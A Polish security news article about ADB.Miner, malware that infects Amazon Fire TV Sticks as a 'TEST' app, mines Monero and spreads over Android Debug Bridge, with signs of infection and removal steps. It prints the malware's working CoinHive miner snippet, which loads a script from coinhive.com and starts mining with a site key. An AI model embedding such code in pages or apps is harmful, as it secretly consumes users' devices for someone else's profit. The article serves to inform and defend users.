Amazon Fire TV Stick zainfekowany koparką kryptowaluty Monero

Niezależnie od urządzenia, na którym jest zainstalowany Android, to ciągle ten sam stary zielony robot, który może zawierać różne nakładki graficznie wyglądem nieprzypominające oryginalny system. Pod względem bezpieczeństwa Android nie ma łatwego życia, a i tym razem autorzy malware wzięli na cel przystawki telewizyjne Amazon Fire TV Stick rozszerzające możliwości zwykłych telewizorów.

Amazon fire tv stick

Użytkownicy forum XDA zgłaszają problemy z wydajnością Amazon Fire TV, podejrzewając problemy z bezpieczeństwem. I nie mylą się, o czym świadczy kod zawarty w złośliwej aplikacji:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
        var miner = new CoinHive.Anonymous('eXnvyAQwXxGV80C4fGuiRiDZiDpDaSrf',{
        threads:3,
        throttle: 0.6
});
        miner.start();
</script>

Amazon Fire TV oraz Amazon Fire TV Stick są infekowane przez malware ADB.Miner, które instaluje się w systemie jako aplikacja „TEST”.

Malware monero Amazon Fire TV

Nie wiadomo gdzie dokładnie jest jej źródło, ale podejrzewa się nieoficjalne lub zcrackowane oprogramowanie do oglądania kanałów telewizyjnych. Dodatkowo ADB.Miner niczym robak komputerowy może rozprzestrzeniać się na inne urządzenia z systemem Android w tej samej sieci. Zadanie ma jednak utrudnione, ponieważ na atakowanym smartfonie lub Smart TV musi być włączona funkcja debugowania (Android Debug Bridge) — chociaż nie zawsze, ponieważ robak potrafi włączyć taki komunikat:

ADB Debugowanie

Jak rozpoznać infekcję Amazon Fire TV Stick?

Jeżeli na ekranie zobaczysz aplikację „Test Ready to launch!”, to Twoje urządzenie jest zainfekowane. Szkodliwe oprogramowanie będzie wykorzystywać do 100% czasu procesora, a więc wszystkie inne zadania realizowane przez system będą znacznie ograniczone wydajnościowo.

W celu całkowitego pozbycia się szkodnika zaleca się przywrócenie ustawień fabrycznych i ponowne sprawowanie urządzeń Amazon z telewizorem. Potem należy jeszcze wyłączyć funkcję debugowania. Dodatkowo rekomendujemy instalację mobilnego oprogramowania antywirusowego dla systemu Android. Warto też ograniczyć instalowanie aplikacji niewiadomego pochodzenia, ponieważ do końca nie można mieć pewności, jaki kod może mieć w sobie zaszyty.



Dodaj komentarz

Treść tego pola jest prywatna i nie będzie udostępniana publicznie.

Zapoznaj się z naszą ofertą

Jeśli zajmujesz się sprzedażą rozwiązań zabezpieczających, jesteś dystrybutorem, autoryzowanym partnerem lub producentem i chciałbyś na portalu AVLab zaprezentować swoje portfolio gronu potencjalnych odbiorców, zareklamować wydarzenie, oprogramowanie, sprzęt lub inne usługi — po prostu napisz do nas. A może mialeś/aś do czynienia z ransomware? Pomagamy też w odszyfrowaniu plików.
Czytaj więcej